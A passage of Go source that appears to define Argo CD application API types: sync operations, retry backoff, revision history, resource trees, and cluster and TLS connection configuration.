InitiatedBy OperationInitiator `json:"initiatedBy,omitempty" protobuf:"bytes,2,opt,name=initiatedBy"`
Info []*Info `json:"info,omitempty" protobuf:"bytes,3,name=info"`
// Retry controls failed sync retry behavior
Retry RetryStrategy `json:"retry,omitempty" protobuf:"bytes,4,opt,name=retry"`
}
func (o *Operation) DryRun() bool {
if o.Sync != nil {
return o.Sync.DryRun
}
return false
}
// SyncOperationResource contains resources to sync.
type SyncOperationResource struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Kind string `json:"kind" protobuf:"bytes,2,opt,name=kind"`
Name string `json:"name" protobuf:"bytes,3,opt,name=name"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
}
// RevisionHistories is a array of history, oldest first and newest last
type RevisionHistories []RevisionHistory
func (in RevisionHistories) LastRevisionHistory() RevisionHistory {
return in[len(in)-1]
}
func (in RevisionHistories) Trunc(n int) RevisionHistories {
i := len(in) - n
if i > 0 {
in = in[i:]
}
return in
}
// HasIdentity determines whether a sync operation is identified by a manifest
func (r SyncOperationResource) HasIdentity(name string, namespace string, gvk schema.GroupVersionKind) bool {
if name == r.Name && gvk.Kind == r.Kind && gvk.Group == r.Group && (r.Namespace == "" || namespace == r.Namespace) {
return true
}
return false
}
// SyncOperation contains sync operation details.
type SyncOperation struct {
// Revision is the revision in which to sync the application to.
// If omitted, will use the revision specified in app spec.
Revision string `json:"revision,omitempty" protobuf:"bytes,1,opt,name=revision"`
// Prune deletes resources that are no longer tracked in git
Prune bool `json:"prune,omitempty" protobuf:"bytes,2,opt,name=prune"`
// DryRun will perform a `kubectl apply --dry-run` without actually performing the sync
DryRun bool `json:"dryRun,omitempty" protobuf:"bytes,3,opt,name=dryRun"`
// SyncStrategy describes how to perform the sync
SyncStrategy *SyncStrategy `json:"syncStrategy,omitempty" protobuf:"bytes,4,opt,name=syncStrategy"`
// Resources describes which resources to sync
Resources []SyncOperationResource `json:"resources,omitempty" protobuf:"bytes,6,opt,name=resources"`
// Source overrides the source definition set in the application.
// This is typically set in a Rollback operation and nil during a Sync operation
Source *ApplicationSource `json:"source,omitempty" protobuf:"bytes,7,opt,name=source"`
// Manifests is an optional field that overrides sync source with a local directory for development
Manifests []string `json:"manifests,omitempty" protobuf:"bytes,8,opt,name=manifests"`
// SyncOptions provide per-sync sync-options, e.g. Validate=false
SyncOptions SyncOptions `json:"syncOptions,omitempty" protobuf:"bytes,9,opt,name=syncOptions"`
}
func (o *SyncOperation) IsApplyStrategy() bool {
return o.SyncStrategy != nil && o.SyncStrategy.Apply != nil
}
// OperationState contains information about state of currently performing operation on application.
type OperationState struct {
// Operation is the original requested operation
Operation Operation `json:"operation" protobuf:"bytes,1,opt,name=operation"`
// Phase is the current phase of the operation
Phase synccommon.OperationPhase `json:"phase" protobuf:"bytes,2,opt,name=phase"`
// Message hold any pertinent messages when attempting to perform operation (typically errors).
Message string `json:"message,omitempty" protobuf:"bytes,3,opt,name=message"`
// SyncResult is the result of a Sync operation
SyncResult *SyncOperationResult `json:"syncResult,omitempty" protobuf:"bytes,4,opt,name=syncResult"`
// StartedAt contains time of operation start
StartedAt metav1.Time `json:"startedAt" protobuf:"bytes,6,opt,name=startedAt"`
// FinishedAt contains time of operation completion
FinishedAt *metav1.Time `json:"finishedAt,omitempty" protobuf:"bytes,7,opt,name=finishedAt"`
// RetryCount contains time of operation retries
RetryCount int64 `json:"retryCount,omitempty" protobuf:"bytes,8,opt,name=retryCount"`
}
type Info struct {
Name string `json:"name" protobuf:"bytes,1,name=name"`
Value string `json:"value" protobuf:"bytes,2,name=value"`
}
type SyncOptions []string
func (o SyncOptions) AddOption(option string) SyncOptions {
for _, j := range o {
if j == option {
return o
}
}
return append(o, option)
}
func (o SyncOptions) RemoveOption(option string) SyncOptions {
for i, j := range o {
if j == option {
return append(o[:i], o[i+1:]...)
}
}
return o
}
func (o SyncOptions) HasOption(option string) bool {
for _, i := range o {
if option == i {
return true
}
}
return false
}
// SyncPolicy controls when a sync will be performed in response to updates in git
type SyncPolicy struct {
// Automated will keep an application synced to the target revision
Automated *SyncPolicyAutomated `json:"automated,omitempty" protobuf:"bytes,1,opt,name=automated"`
// Options allow you to specify whole app sync-options
SyncOptions SyncOptions `json:"syncOptions,omitempty" protobuf:"bytes,2,opt,name=syncOptions"`
// Retry controls failed sync retry behavior
Retry *RetryStrategy `json:"retry,omitempty" protobuf:"bytes,3,opt,name=retry"`
}
func (p *SyncPolicy) IsZero() bool {
return p == nil || (p.Automated == nil && len(p.SyncOptions) == 0 && p.Retry == nil)
}
type RetryStrategy struct {
// Limit is the maximum number of attempts when retrying a container
Limit int64 `json:"limit,omitempty" protobuf:"bytes,1,opt,name=limit"`
// Backoff is a backoff strategy
Backoff *Backoff `json:"backoff,omitempty" protobuf:"bytes,2,opt,name=backoff,casttype=Backoff"`
}
func parseStringToDuration(durationString string) (time.Duration, error) {
var suspendDuration time.Duration
// If no units are attached, treat as seconds
if val, err := strconv.Atoi(durationString); err == nil {
suspendDuration = time.Duration(val) * time.Second
} else if duration, err := time.ParseDuration(durationString); err == nil {
suspendDuration = duration
} else {
return 0, fmt.Errorf("unable to parse %s as a duration", durationString)
}
return suspendDuration, nil
}
func (r *RetryStrategy) NextRetryAt(lastAttempt time.Time, retryCounts int64) (time.Time, error) {
maxDuration := common.DefaultSyncRetryMaxDuration
duration := common.DefaultSyncRetryDuration
factor := common.DefaultSyncRetryFactor
var err error
if r.Backoff != nil {
if r.Backoff.Duration != "" {
if duration, err = parseStringToDuration(r.Backoff.Duration); err != nil {
return time.Time{}, err
}
}
if r.Backoff.MaxDuration != "" {
if maxDuration, err = parseStringToDuration(r.Backoff.MaxDuration); err != nil {
return time.Time{}, err
}
}
if r.Backoff.Factor != nil {
factor = *r.Backoff.Factor
}
}
// Formula: timeToWait = duration * factor^retry_number
// Note that timeToWait should equal to duration for the first retry attempt.
timeToWait := duration * time.Duration(math.Pow(float64(factor), float64(retryCounts)))
if maxDuration > 0 {
timeToWait = time.Duration(math.Min(float64(maxDuration), float64(timeToWait)))
}
return lastAttempt.Add(timeToWait), nil
}
// Backoff is a backoff strategy to use within retryStrategy
type Backoff struct {
// Duration is the amount to back off. Default unit is seconds, but could also be a duration (e.g. "2m", "1h")
Duration string `json:"duration,omitempty" protobuf:"bytes,1,opt,name=duration"`
// Factor is a factor to multiply the base duration after each failed retry
Factor *int64 `json:"factor,omitempty" protobuf:"bytes,2,name=factor"`
// MaxDuration is the maximum amount of time allowed for the backoff strategy
MaxDuration string `json:"maxDuration,omitempty" protobuf:"bytes,3,opt,name=maxDuration"`
}
// SyncPolicyAutomated controls the behavior of an automated sync
type SyncPolicyAutomated struct {
// Prune will prune resources automatically as part of automated sync (default: false)
Prune bool `json:"prune,omitempty" protobuf:"bytes,1,opt,name=prune"`
// SelfHeal enables auto-syncing if (default: false)
SelfHeal bool `json:"selfHeal,omitempty" protobuf:"bytes,2,opt,name=selfHeal"`
// AllowEmpty allows apps have zero live resources (default: false)
AllowEmpty bool `json:"allowEmpty,omitempty" protobuf:"bytes,3,opt,name=allowEmpty"`
}
// SyncStrategy controls the manner in which a sync is performed
type SyncStrategy struct {
// Apply will perform a `kubectl apply` to perform the sync.
Apply *SyncStrategyApply `json:"apply,omitempty" protobuf:"bytes,1,opt,name=apply"`
// Hook will submit any referenced resources to perform the sync. This is the default strategy
Hook *SyncStrategyHook `json:"hook,omitempty" protobuf:"bytes,2,opt,name=hook"`
}
func (m *SyncStrategy) Force() bool {
if m == nil {
return false
} else if m.Apply != nil {
return m.Apply.Force
} else if m.Hook != nil {
return m.Hook.Force
} else {
return false
}
}
// SyncStrategyApply uses `kubectl apply` to perform the apply
type SyncStrategyApply struct {
// Force indicates whether or not to supply the --force flag to `kubectl apply`.
// The --force flag deletes and re-create the resource, when PATCH encounters conflict and has
// retried for 5 times.
Force bool `json:"force,omitempty" protobuf:"bytes,1,opt,name=force"`
}
// SyncStrategyHook will perform a sync using hooks annotations.
// If no hook annotation is specified falls back to `kubectl apply`.
type SyncStrategyHook struct {
// Embed SyncStrategyApply type to inherit any `apply` options
// +optional
SyncStrategyApply `json:",inline" protobuf:"bytes,1,opt,name=syncStrategyApply"`
}
// data about a specific revision within a repo
type RevisionMetadata struct {
// who authored this revision,
// typically their name and email, e.g. "John Doe <[email protected]>",
// but might not match this example
Author string `json:"author,omitempty" protobuf:"bytes,1,opt,name=author"`
// when the revision was authored
Date metav1.Time `json:"date" protobuf:"bytes,2,opt,name=date"`
// tags on the revision,
// note - tags can move from one revision to another
Tags []string `json:"tags,omitempty" protobuf:"bytes,3,opt,name=tags"`
// the message associated with the revision,
// probably the commit message,
// this is truncated to the first newline or 64 characters (which ever comes first)
Message string `json:"message,omitempty" protobuf:"bytes,4,opt,name=message"`
// If revision was signed with GPG, and signature verification is enabled,
// this contains a hint on the signer
SignatureInfo string `json:"signatureInfo,omitempty" protobuf:"bytes,5,opt,name=signatureInfo"`
}
// SyncOperationResult represent result of sync operation
type SyncOperationResult struct {
// Resources holds the sync result of each individual resource
Resources ResourceResults `json:"resources,omitempty" protobuf:"bytes,1,opt,name=resources"`
// Revision holds the revision of the sync
Revision string `json:"revision" protobuf:"bytes,2,opt,name=revision"`
// Source records the application source information of the sync, used for comparing auto-sync
Source ApplicationSource `json:"source,omitempty" protobuf:"bytes,3,opt,name=source"`
}
// ResourceResult holds the operation result details of a specific resource
type ResourceResult struct {
Group string `json:"group" protobuf:"bytes,1,opt,name=group"`
Version string `json:"version" protobuf:"bytes,2,opt,name=version"`
Kind string `json:"kind" protobuf:"bytes,3,opt,name=kind"`
Namespace string `json:"namespace" protobuf:"bytes,4,opt,name=namespace"`
Name string `json:"name" protobuf:"bytes,5,opt,name=name"`
// the final result of the sync, this is be empty if the resources is yet to be applied/pruned and is always zero-value for hooks
Status synccommon.ResultCode `json:"status,omitempty" protobuf:"bytes,6,opt,name=status"`
// message for the last sync OR operation
Message string `json:"message,omitempty" protobuf:"bytes,7,opt,name=message"`
// the type of the hook, empty for non-hook resources
HookType synccommon.HookType `json:"hookType,omitempty" protobuf:"bytes,8,opt,name=hookType"`
// the state of any operation associated with this resource OR hook
// note: can contain values for non-hook resources
HookPhase synccommon.OperationPhase `json:"hookPhase,omitempty" protobuf:"bytes,9,opt,name=hookPhase"`
// indicates the particular phase of the sync that this is for
SyncPhase synccommon.SyncPhase `json:"syncPhase,omitempty" protobuf:"bytes,10,opt,name=syncPhase"`
}
func (r *ResourceResult) GroupVersionKind() schema.GroupVersionKind {
return schema.GroupVersionKind{
Group: r.Group,
Version: r.Version,
Kind: r.Kind,
}
}
type ResourceResults []*ResourceResult
func (r ResourceResults) Find(group string, kind string, namespace string, name string, phase synccommon.SyncPhase) (int, *ResourceResult) {
for i, res := range r {
if res.Group == group && res.Kind == kind && res.Namespace == namespace && res.Name == name && res.SyncPhase == phase {
return i, res
}
}
return 0, nil
}
func (r ResourceResults) PruningRequired() (num int) {
for _, res := range r {
if res.Status == synccommon.ResultCodePruneSkipped {
num++
}
}
return num
}
// RevisionHistory contains information relevant to an application deployment
type RevisionHistory struct {
// Revision holds the revision of the sync
Revision string `json:"revision" protobuf:"bytes,2,opt,name=revision"`
// DeployedAt holds the time the deployment completed
DeployedAt metav1.Time `json:"deployedAt" protobuf:"bytes,4,opt,name=deployedAt"`
// ID is an auto incrementing identifier of the RevisionHistory
ID int64 `json:"id" protobuf:"bytes,5,opt,name=id"`
Source ApplicationSource `json:"source,omitempty" protobuf:"bytes,6,opt,name=source"`
// DeployStartedAt holds the time the deployment started
DeployStartedAt *metav1.Time `json:"deployStartedAt,omitempty" protobuf:"bytes,7,opt,name=deployStartedAt"`
}
// ApplicationWatchEvent contains information about application change.
type ApplicationWatchEvent struct {
Type watch.EventType `json:"type" protobuf:"bytes,1,opt,name=type,casttype=k8s.io/apimachinery/pkg/watch.EventType"`
// Application is:
// * If Type is Added or Modified: the new state of the object.
// * If Type is Deleted: the state of the object immediately before deletion.
// * If Type is Error: *api.Status is recommended; other types may make sense
// depending on context.
Application Application `json:"application" protobuf:"bytes,2,opt,name=application"`
}
// ApplicationList is list of Application resources
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type ApplicationList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
Items []Application `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// ComponentParameter contains information about component parameter value
type ComponentParameter struct {
Component string `json:"component,omitempty" protobuf:"bytes,1,opt,name=component"`
Name string `json:"name" protobuf:"bytes,2,opt,name=name"`
Value string `json:"value" protobuf:"bytes,3,opt,name=value"`
}
// SyncStatusCode is a type which represents possible comparison results
type SyncStatusCode string
// Possible comparison results
const (
SyncStatusCodeUnknown SyncStatusCode = "Unknown"
SyncStatusCodeSynced SyncStatusCode = "Synced"
SyncStatusCodeOutOfSync SyncStatusCode = "OutOfSync"
)
// ApplicationConditionType represents type of application condition. Type name has following convention:
// prefix "Error" means error condition
// prefix "Warning" means warning condition
// prefix "Info" means informational condition
type ApplicationConditionType = string
const (
// ApplicationConditionDeletionError indicates that controller failed to delete application
ApplicationConditionDeletionError = "DeletionError"
// ApplicationConditionInvalidSpecError indicates that application source is invalid
ApplicationConditionInvalidSpecError = "InvalidSpecError"
// ApplicationConditionComparisonError indicates controller failed to compare application state
ApplicationConditionComparisonError = "ComparisonError"
// ApplicationConditionSyncError indicates controller failed to automatically sync the application
ApplicationConditionSyncError = "SyncError"
// ApplicationConditionUnknownError indicates an unknown controller error
ApplicationConditionUnknownError = "UnknownError"
// ApplicationConditionSharedResourceWarning indicates that controller detected resources which belongs to more than one application
ApplicationConditionSharedResourceWarning = "SharedResourceWarning"
// ApplicationConditionRepeatedResourceWarning indicates that application source has resource with same Group, Kind, Name, Namespace multiple times
ApplicationConditionRepeatedResourceWarning = "RepeatedResourceWarning"
// ApplicationConditionExcludedResourceWarning indicates that application has resource which is configured to be excluded
ApplicationConditionExcludedResourceWarning = "ExcludedResourceWarning"
// ApplicationConditionOrphanedResourceWarning indicates that application has orphaned resources
ApplicationConditionOrphanedResourceWarning = "OrphanedResourceWarning"
)
// ApplicationCondition contains details about current application condition
type ApplicationCondition struct {
// Type is an application condition type
Type ApplicationConditionType `json:"type" protobuf:"bytes,1,opt,name=type"`
// Message contains human-readable message indicating details about condition
Message string `json:"message" protobuf:"bytes,2,opt,name=message"`
// LastTransitionTime is the time the condition was first observed.
LastTransitionTime *metav1.Time `json:"lastTransitionTime,omitempty" protobuf:"bytes,3,opt,name=lastTransitionTime"`
}
// ComparedTo contains application source and target which was used for resources comparison
type ComparedTo struct {
Source ApplicationSource `json:"source" protobuf:"bytes,1,opt,name=source"`
Destination ApplicationDestination `json:"destination" protobuf:"bytes,2,opt,name=destination"`
}
// SyncStatus is a comparison result of application spec and deployed application.
type SyncStatus struct {
Status SyncStatusCode `json:"status" protobuf:"bytes,1,opt,name=status,casttype=SyncStatusCode"`
ComparedTo ComparedTo `json:"comparedTo,omitempty" protobuf:"bytes,2,opt,name=comparedTo"`
Revision string `json:"revision,omitempty" protobuf:"bytes,3,opt,name=revision"`
}
type HealthStatus struct {
Status health.HealthStatusCode `json:"status,omitempty" protobuf:"bytes,1,opt,name=status"`
Message string `json:"message,omitempty" protobuf:"bytes,2,opt,name=message"`
}
// InfoItem contains human readable information about object
type InfoItem struct {
// Name is a human readable title for this piece of information.
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
// Value is human readable content.
Value string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
}
// ResourceNetworkingInfo holds networking resource related information
type ResourceNetworkingInfo struct {
TargetLabels map[string]string `json:"targetLabels,omitempty" protobuf:"bytes,1,opt,name=targetLabels"`
TargetRefs []ResourceRef `json:"targetRefs,omitempty" protobuf:"bytes,2,opt,name=targetRefs"`
Labels map[string]string `json:"labels,omitempty" protobuf:"bytes,3,opt,name=labels"`
Ingress []v1.LoadBalancerIngress `json:"ingress,omitempty" protobuf:"bytes,4,opt,name=ingress"`
// ExternalURLs holds list of URLs which should be available externally. List is populated for ingress resources using rules hostnames.
ExternalURLs []string `json:"externalURLs,omitempty" protobuf:"bytes,5,opt,name=externalURLs"`
}
type HostResourceInfo struct {
ResourceName v1.ResourceName `json:"resourceName,omitempty" protobuf:"bytes,1,name=resourceName"`
RequestedByApp int64 `json:"requestedByApp,omitempty" protobuf:"bytes,2,name=requestedByApp"`
RequestedByNeighbors int64 `json:"requestedByNeighbors,omitempty" protobuf:"bytes,3,name=requestedByNeighbors"`
Capacity int64 `json:"capacity,omitempty" protobuf:"bytes,4,name=capacity"`
}
// HostInfo holds host name and resources metrics
type HostInfo struct {
Name string `json:"name,omitempty" protobuf:"bytes,1,name=name"`
ResourcesInfo []HostResourceInfo `json:"resourcesInfo,omitempty" protobuf:"bytes,2,name=resourcesInfo"`
SystemInfo v1.NodeSystemInfo `json:"systemInfo,omitempty" protobuf:"bytes,3,opt,name=systemInfo"`
}
// ApplicationTree holds nodes which belongs to the application
type ApplicationTree struct {
// Nodes contains list of nodes which either directly managed by the application and children of directly managed nodes.
Nodes []ResourceNode `json:"nodes,omitempty" protobuf:"bytes,1,rep,name=nodes"`
// OrphanedNodes contains if or orphaned nodes: nodes which are not managed by the app but in the same namespace. List is populated only if orphaned resources enabled in app project.
OrphanedNodes []ResourceNode `json:"orphanedNodes,omitempty" protobuf:"bytes,2,rep,name=orphanedNodes"`
// Hosts holds list of Kubernetes nodes that run application related pods
Hosts []HostInfo `json:"hosts,omitempty" protobuf:"bytes,3,rep,name=hosts"`
}
// Normalize sorts application tree nodes and hosts. The persistent order allows to
// effectively compare previously cached app tree and allows to unnecessary Redis requests.
func (t *ApplicationTree) Normalize() {
sort.Slice(t.Nodes, func(i, j int) bool {
return t.Nodes[i].FullName() < t.Nodes[j].FullName()
})
sort.Slice(t.OrphanedNodes, func(i, j int) bool {
return t.OrphanedNodes[i].FullName() < t.OrphanedNodes[j].FullName()
})
sort.Slice(t.Hosts, func(i, j int) bool {
return t.Hosts[i].Name < t.Hosts[j].Name
})
}
type ApplicationSummary struct {
// ExternalURLs holds all external URLs of application child resources.
ExternalURLs []string `json:"externalURLs,omitempty" protobuf:"bytes,1,opt,name=externalURLs"`
// Images holds all images of application child resources.
Images []string `json:"images,omitempty" protobuf:"bytes,2,opt,name=images"`
}
func (t *ApplicationTree) FindNode(group string, kind string, namespace string, name string) *ResourceNode {
for _, n := range append(t.Nodes, t.OrphanedNodes...) {
if n.Group == group && n.Kind == kind && n.Namespace == namespace && n.Name == name {
return &n
}
}
return nil
}
func (t *ApplicationTree) GetSummary() ApplicationSummary {
urlsSet := make(map[string]bool)
imagesSet := make(map[string]bool)
for _, node := range t.Nodes {
if node.NetworkingInfo != nil {
for _, url := range node.NetworkingInfo.ExternalURLs {
urlsSet[url] = true
}
}
for _, image := range node.Images {
imagesSet[image] = true
}
}
urls := make([]string, 0)
for url := range urlsSet {
urls = append(urls, url)
}
sort.Slice(urls, func(i, j int) bool {
return urls[i] < urls[j]
})
images := make([]string, 0)
for image := range imagesSet {
images = append(images, image)
}
sort.Slice(images, func(i, j int) bool {
return images[i] < images[j]
})
return ApplicationSummary{ExternalURLs: urls, Images: images}
}
// ResourceRef includes fields which unique identify resource
type ResourceRef struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Version string `json:"version,omitempty" protobuf:"bytes,2,opt,name=version"`
Kind string `json:"kind,omitempty" protobuf:"bytes,3,opt,name=kind"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
Name string `json:"name,omitempty" protobuf:"bytes,5,opt,name=name"`
UID string `json:"uid,omitempty" protobuf:"bytes,6,opt,name=uid"`
}
// ResourceNode contains information about live resource and its children
type ResourceNode struct {
ResourceRef `json:",inline" protobuf:"bytes,1,opt,name=resourceRef"`
ParentRefs []ResourceRef `json:"parentRefs,omitempty" protobuf:"bytes,2,opt,name=parentRefs"`
Info []InfoItem `json:"info,omitempty" protobuf:"bytes,3,opt,name=info"`
NetworkingInfo *ResourceNetworkingInfo `json:"networkingInfo,omitempty" protobuf:"bytes,4,opt,name=networkingInfo"`
ResourceVersion string `json:"resourceVersion,omitempty" protobuf:"bytes,5,opt,name=resourceVersion"`
Images []string `json:"images,omitempty" protobuf:"bytes,6,opt,name=images"`
Health *HealthStatus `json:"health,omitempty" protobuf:"bytes,7,opt,name=health"`
CreatedAt *metav1.Time `json:"createdAt,omitempty" protobuf:"bytes,8,opt,name=createdAt"`
}
// FullName returns node full name
func (n *ResourceNode) FullName() string {
return fmt.Sprintf("%s/%s/%s/%s", n.Group, n.Kind, n.Namespace, n.Name)
}
func (n *ResourceNode) GroupKindVersion() schema.GroupVersionKind {
return schema.GroupVersionKind{
Group: n.Group,
Version: n.Version,
Kind: n.Kind,
}
}
// ResourceStatus holds the current sync and health status of a resource
type ResourceStatus struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Version string `json:"version,omitempty" protobuf:"bytes,2,opt,name=version"`
Kind string `json:"kind,omitempty" protobuf:"bytes,3,opt,name=kind"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
Name string `json:"name,omitempty" protobuf:"bytes,5,opt,name=name"`
Status SyncStatusCode `json:"status,omitempty" protobuf:"bytes,6,opt,name=status"`
Health *HealthStatus `json:"health,omitempty" protobuf:"bytes,7,opt,name=health"`
Hook bool `json:"hook,omitempty" protobuf:"bytes,8,opt,name=hook"`
RequiresPruning bool `json:"requiresPruning,omitempty" protobuf:"bytes,9,opt,name=requiresPruning"`
}
func (r *ResourceStatus) GroupVersionKind() schema.GroupVersionKind {
return schema.GroupVersionKind{Group: r.Group, Version: r.Version, Kind: r.Kind}
}
// ResourceDiff holds the diff of a live and target resource object
type ResourceDiff struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Kind string `json:"kind,omitempty" protobuf:"bytes,2,opt,name=kind"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,3,opt,name=namespace"`
Name string `json:"name,omitempty" protobuf:"bytes,4,opt,name=name"`
// TargetState contains the JSON serialized resource manifest defined in the Git/Helm
TargetState string `json:"targetState,omitempty" protobuf:"bytes,5,opt,name=targetState"`
// TargetState contains the JSON live resource manifest
LiveState string `json:"liveState,omitempty" protobuf:"bytes,6,opt,name=liveState"`
// Diff contains the JSON patch between target and live resource
// Deprecated: use NormalizedLiveState and PredictedLiveState to render the difference
Diff string `json:"diff,omitempty" protobuf:"bytes,7,opt,name=diff"`
Hook bool `json:"hook,omitempty" protobuf:"bytes,8,opt,name=hook"`
// NormalizedLiveState contains JSON serialized live resource state with applied normalizations
NormalizedLiveState string `json:"normalizedLiveState,omitempty" protobuf:"bytes,9,opt,name=normalizedLiveState"`
// PredictedLiveState contains JSON serialized resource state that is calculated based on normalized and target resource state
PredictedLiveState string `json:"predictedLiveState,omitempty" protobuf:"bytes,10,opt,name=predictedLiveState"`
ResourceVersion string `json:"resourceVersion,omitempty" protobuf:"bytes,11,opt,name=resourceVersion"`
Modified bool `json:"modified,omitempty" protobuf:"bytes,12,opt,name=modified"`
}
// FullName returns full name of a node that was used for diffing
func (r *ResourceDiff) FullName() string {
return fmt.Sprintf("%s/%s/%s/%s", r.Group, r.Kind, r.Namespace, r.Name)
}
// ConnectionStatus represents connection status
type ConnectionStatus = string
const (
ConnectionStatusSuccessful = "Successful"
ConnectionStatusFailed = "Failed"
ConnectionStatusUnknown = "Unknown"
)
// ConnectionState contains information about remote resource connection state
type ConnectionState struct {
Status ConnectionStatus `json:"status" protobuf:"bytes,1,opt,name=status"`
Message string `json:"message" protobuf:"bytes,2,opt,name=message"`
ModifiedAt *metav1.Time `json:"attemptedAt" protobuf:"bytes,3,opt,name=attemptedAt"`
}
// Cluster is the definition of a cluster resource
type Cluster struct {
// ID is an internal field cluster identifier. Not exposed via API.
ID string `json:"-"`
// Server is the API server URL of the Kubernetes cluster
Server string `json:"server" protobuf:"bytes,1,opt,name=server"`
// Name of the cluster. If omitted, will use the server address
Name string `json:"name" protobuf:"bytes,2,opt,name=name"`
// Config holds cluster information for connecting to a cluster
Config ClusterConfig `json:"config" protobuf:"bytes,3,opt,name=config"`
// DEPRECATED: use Info.ConnectionState field instead.
// ConnectionState contains information about cluster connection state
ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,4,opt,name=connectionState"`
// DEPRECATED: use Info.ServerVersion field instead.
// The server version
ServerVersion string `json:"serverVersion,omitempty" protobuf:"bytes,5,opt,name=serverVersion"`
// Holds list of namespaces which are accessible in that cluster. Cluster level resources would be ignored if namespace list is not empty.
Namespaces []string `json:"namespaces,omitempty" protobuf:"bytes,6,opt,name=namespaces"`
// RefreshRequestedAt holds time when cluster cache refresh has been requested
RefreshRequestedAt *metav1.Time `json:"refreshRequestedAt,omitempty" protobuf:"bytes,7,opt,name=refreshRequestedAt"`
// Holds information about cluster cache
Info ClusterInfo `json:"info,omitempty" protobuf:"bytes,8,opt,name=info"`
// Shard contains optional shard number. Calculated on the fly by the application controller if not specified.
Shard *int64 `json:"shard,omitempty" protobuf:"bytes,9,opt,name=shard"`
}
func (c *Cluster) Equals(other *Cluster) bool {
if c.Server != other.Server {
return false
}
if c.Name != other.Name {
return false
}
if strings.Join(c.Namespaces, ",") != strings.Join(other.Namespaces, ",") {
return false
}
var shard int64 = -1
if c.Shard != nil {
shard = *c.Shard
}
var otherShard int64 = -1
if other.Shard != nil {
otherShard = *other.Shard
}
if shard != otherShard {
return false
}
return reflect.DeepEqual(c.Config, other.Config)
}
type ClusterInfo struct {
ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,1,opt,name=connectionState"`
ServerVersion string `json:"serverVersion,omitempty" protobuf:"bytes,2,opt,name=serverVersion"`
CacheInfo ClusterCacheInfo `json:"cacheInfo,omitempty" protobuf:"bytes,3,opt,name=cacheInfo"`
ApplicationsCount int64 `json:"applicationsCount" protobuf:"bytes,4,opt,name=applicationsCount"`
}
type ClusterCacheInfo struct {
// ResourcesCount holds number of observed Kubernetes resources
ResourcesCount int64 `json:"resourcesCount,omitempty" protobuf:"bytes,1,opt,name=resourcesCount"`
// APIsCount holds number of observed Kubernetes API count
APIsCount int64 `json:"apisCount,omitempty" protobuf:"bytes,2,opt,name=apisCount"`
// LastCacheSyncTime holds time of most recent cache synchronization
LastCacheSyncTime *metav1.Time `json:"lastCacheSyncTime,omitempty" protobuf:"bytes,3,opt,name=lastCacheSyncTime"`
}
// ClusterList is a collection of Clusters.
type ClusterList struct {
metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
Items []Cluster `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// AWSAuthConfig is an AWS IAM authentication configuration
type AWSAuthConfig struct {
// ClusterName contains AWS cluster name
ClusterName string `json:"clusterName,omitempty" protobuf:"bytes,1,opt,name=clusterName"`
// RoleARN contains optional role ARN. If set then AWS IAM Authenticator assume a role to perform cluster operations instead of the default AWS credential provider chain.
RoleARN string `json:"roleARN,omitempty" protobuf:"bytes,2,opt,name=roleARN"`
}
// ExecProviderConfig is config used to call an external command to perform cluster authentication
// See: https://godoc.org/k8s.io/client-go/tools/clientcmd/api#ExecConfig
type ExecProviderConfig struct {
// Command to execute
Command string `json:"command,omitempty" protobuf:"bytes,1,opt,name=command"`
// Arguments to pass to the command when executing it
Args []string `json:"args,omitempty" protobuf:"bytes,2,rep,name=args"`
// Env defines additional environment variables to expose to the process
Env map[string]string `json:"env,omitempty" protobuf:"bytes,3,opt,name=env"`
// Preferred input version of the ExecInfo
APIVersion string `json:"apiVersion,omitempty" protobuf:"bytes,4,opt,name=apiVersion"`
// This text is shown to the user when the executable doesn't seem to be present
InstallHint string `json:"installHint,omitempty" protobuf:"bytes,5,opt,name=installHint"`
}
// ClusterConfig is the configuration attributes. This structure is subset of the go-client
// rest.Config with annotations added for marshalling.
type ClusterConfig struct {
// Server requires Basic authentication
Username string `json:"username,omitempty" protobuf:"bytes,1,opt,name=username"`
Password string `json:"password,omitempty" protobuf:"bytes,2,opt,name=password"`
// Server requires Bearer authentication. This client will not attempt to use
// refresh tokens for an OAuth2 flow.
// TODO: demonstrate an OAuth2 compatible client.
BearerToken string `json:"bearerToken,omitempty" protobuf:"bytes,3,opt,name=bearerToken"`
// TLSClientConfig contains settings to enable transport layer security
TLSClientConfig `json:"tlsClientConfig" protobuf:"bytes,4,opt,name=tlsClientConfig"`
// AWSAuthConfig contains IAM authentication configuration
AWSAuthConfig *AWSAuthConfig `json:"awsAuthConfig,omitempty" protobuf:"bytes,5,opt,name=awsAuthConfig"`
// ExecProviderConfig contains configuration for an exec provider
ExecProviderConfig *ExecProviderConfig `json:"execProviderConfig,omitempty" protobuf:"bytes,6,opt,name=execProviderConfig"`
}
// TLSClientConfig contains settings to enable transport layer security
type TLSClientConfig struct {
// Server should be accessed without verifying the TLS certificate. For testing only.
Insecure bool `json:"insecure" protobuf:"bytes,1,opt,name=insecure"`
// ServerName is passed to the server for SNI and is used in the client to check server
// certificates against. If ServerName is empty, the hostname used to contact the
// server is used.
ServerName string `json:"serverName,omitempty" protobuf:"bytes,2,opt,name=serverName"`
// CertData holds PEM-encoded bytes (typically read from a client certificate file).
// CertData takes precedence over CertFile
CertData []byte `json:"certData,omitempty" protobuf:"bytes,3,opt,name=certData"`
// KeyData holds PEM-encoded bytes (typically read from a client certificate key file).
// KeyData takes precedence over KeyFile
KeyData []byte `json:"keyData,omitempty" protobuf:"bytes,4,opt,name=keyData"`
